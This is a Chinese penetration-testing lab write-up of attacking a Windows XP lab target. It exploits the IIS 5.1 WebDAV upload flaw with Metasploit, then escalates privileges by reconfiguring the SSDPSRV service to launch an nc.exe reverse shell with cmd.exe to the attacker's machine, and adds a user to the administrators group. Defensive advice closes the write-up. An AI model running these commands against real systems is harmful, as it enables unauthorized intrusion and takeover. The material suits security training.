渗透测试案例三：IIS WebDAV漏洞利用与Windows服务提权<\/h1>

0x00 实验环境<\/h2>

攻击机<\/strong>: Kali Linux (IP: 10.11.0.90)<\/li>

目标靶机<\/strong>: Windows XP SP1 (IP: 10.11.1.13)<\/li> <\/ul>
0x01 信息收集与初步渗透<\/h2>
1. 端口扫描<\/h3>
使用nmap进行端口扫描：<\/p>
nmap -sS -sV -p 1-1024 -Pn 10.11.1.13 <\/span><\/span><\/code><\/pre>扫描结果：<\/p> 21\/tcp open ftp (Microsoft ftpd)<\/li> 80\/tcp open http (Microsoft IIS httpd 5.1)<\/li> <\/ul> 2. FTP匿名登录检查<\/h3> ftp 10.11.1.13 <\/span><\/span><\/code><\/pre>使用用户名anonymous<\/code>和任意密码可成功登录，发现存在以下目录：<\/p> AdminScripts<\/li> ftproot<\/li> iissamples<\/li> Scripts<\/li> wwwroot<\/li> <\/ul> 3. IIS WebDAV漏洞利用<\/h3> 发现目标运行IIS 5.1，搜索到IIS WebDAV Write Access Code Execution漏洞，使用Metasploit模块：<\/p> msf > use exploit\/windows\/iis\/iis_webdav_upload_asp <\/span><\/span>msf exploit(<\/span>iis_webdav_upload_asp)<\/span> > set RHOST 10.11.1.13 <\/span><\/span>msf exploit(<\/span>iis_webdav_upload_asp)<\/span> > set PATH \/hahaha.asp <\/span><\/span>msf exploit(<\/span>iis_webdav_upload_asp)<\/span> > run <\/span><\/span><\/code><\/pre>成功获取meterpreter会话，但权限为BOB\IWAM_BOB<\/code>，非SYSTEM权限。<\/p> 0x02 权限提升<\/h2> 1. 系统信息收集<\/h3> meterpreter > getuid <\/span><\/span>Server username: BOB\I<\/span>WAM_BOB <\/span><\/span> <\/span><\/span>meterpreter > sysinfo <\/span><\/span>Computer: BOB <\/span><\/span>OS: Windows XP (<\/span>Build 2600, Service Pack 1)<\/span> <\/span><\/span>Architecture: x86 <\/span><\/span>System Language: en_US <\/span><\/span>Domain: WORKGROUP <\/span><\/span>Logged On Users: 3<\/span> <\/span><\/span>Meterpreter: x86\/windows <\/span><\/span><\/code><\/pre>2. 提权工具准备<\/h3> 上传必要工具到目标系统：<\/p> accesschk_xp.exe<\/code> - 检查权限的工具<\/li> nc.exe<\/code> - netcat用于反弹shell<\/li> <\/ul> meterpreter > upload accesschk_xp.exe c:\\<\/span>inetpub\\<\/span>accesschk_xp.exe <\/span><\/span>meterpreter > upload nc.exe c:\\<\/span>inetpub\\<\/span>nc.exe <\/span><\/span><\/code><\/pre>3. 查找可写服务<\/h3> 检查当前用户(IWAM_BOB)具有写权限的Windows服务：<\/p> C:\Inetpub>accesschk_xp.exe \/accepteula -uwcqv IWAM_BOB * > ack.txt<\/span> <\/span><\/span><\/code><\/pre>发现两个可写服务：<\/p> SSDPSRV<\/li> upnphost<\/li> <\/ul> 4. 服务权限分析<\/h3> 检查SSDPSRV服务的权限配置：<\/p> C:\Inetpub>accesschk_xp.exe \/accepteula -ucqv SSDPSRV<\/span> <\/span><\/span><\/code><\/pre>结果显示该服务可以使用NT AUTHORITY\SYSTEM<\/code>权限运行。<\/p> 5. 服务配置修改<\/h3> 修改SSDPSRV服务配置，使其执行nc反弹shell：<\/p> C:\Inetpub>sc qc SSDPSRV<\/span> <\/span><\/span>C:\Inetpub>sc config SSDPSRV binpath= "c:\inetpub\nc.exe -nv 10.11.0.90 9090 -e cmd.exe"<\/span> <\/span><\/span>C:\Inetpub>sc config SSDPSRV obj= ".\LocalSystem" password= ""<\/span> <\/span><\/span>C:\Inetpub>sc config SSDPSRV start= "demand"<\/span> <\/span><\/span><\/code><\/pre>6. 启动服务获取SYSTEM权限<\/h3> 在攻击机上开启监听：<\/p> root@kali:~# nc -lvvp 9090<\/span> <\/span><\/span><\/code><\/pre>在目标机上启动服务：<\/p> C:\Inetpub>net start SSDPSRV<\/span> <\/span><\/span><\/code><\/pre>成功获取SYSTEM权限的shell。<\/p> 7. 后渗透操作<\/h3> 将当前用户(IWAM_BOB)加入管理员组：<\/p> C:\WINDOWS\system32>net localgroup administrators IWAM_BOB \/add<\/span> <\/span><\/span><\/code><\/pre>查找flag文件：<\/p> C:\>dir \/b \/s proof.txt<\/span> <\/span><\/span>C:\Documents and Settings\Administrator\Desktop\proof.txt<\/span> <\/span><\/span><\/code><\/pre>0x03 技术要点总结<\/h2> 信息收集阶段<\/strong>：<\/p> 使用nmap进行端口扫描和服务识别<\/li> 检查常见服务的默认\/匿名访问权限<\/li> <\/ul> <\/li> 初始渗透阶段<\/strong>：<\/p> 利用IIS 5.1的WebDAV写权限漏洞上传webshell<\/li> 使用Metasploit框架自动化利用漏洞<\/li> <\/ul> <\/li> 权限提升阶段<\/strong>：<\/p> 识别不安全的服务权限配置<\/li> 使用accesschk工具检查当前用户的权限<\/li> 修改服务配置以执行任意命令<\/li> 利用服务的高权限执行反弹shell<\/li> <\/ul> <\/li> 后渗透阶段<\/strong>：<\/p> 将当前用户提升为管理员<\/li> 查找系统敏感信息(如proof.txt)<\/li> <\/ul> <\/li> <\/ol> 0x04 防御建议<\/h2> 服务加固<\/strong>：<\/p> 限制服务的执行权限<\/li> 定期审核服务配置<\/li> <\/ul> <\/li> 漏洞修复<\/strong>：<\/p> 及时更新IIS和Windows系统补丁<\/li> 禁用不必要的服务(如WebDAV)<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 遵循最小权限原则<\/li> 限制匿名访问权限<\/li> <\/ul> <\/li> 监控措施<\/strong>：<\/p> 监控服务配置变更<\/li> 设置文件完整性检查<\/li> <\/ul> <\/li> <\/ol> 0x05 参考工具<\/h2> 信息收集<\/strong>：<\/p> nmap<\/li> ftp客户端<\/li> <\/ul> <\/li> 漏洞利用<\/strong>：<\/p> Metasploit框架<\/li> IIS WebDAV漏洞利用模块<\/li> <\/ul> <\/li> 权限提升<\/strong>：<\/p> accesschk.exe<\/li> netcat(nc.exe)<\/li> Windows服务管理命令(sc)<\/li> <\/ul> <\/li> 后渗透<\/strong>：<\/p> Windows系统命令<\/li> 文件搜索工具<\/li> <\/ul> <\/li> <\/ol>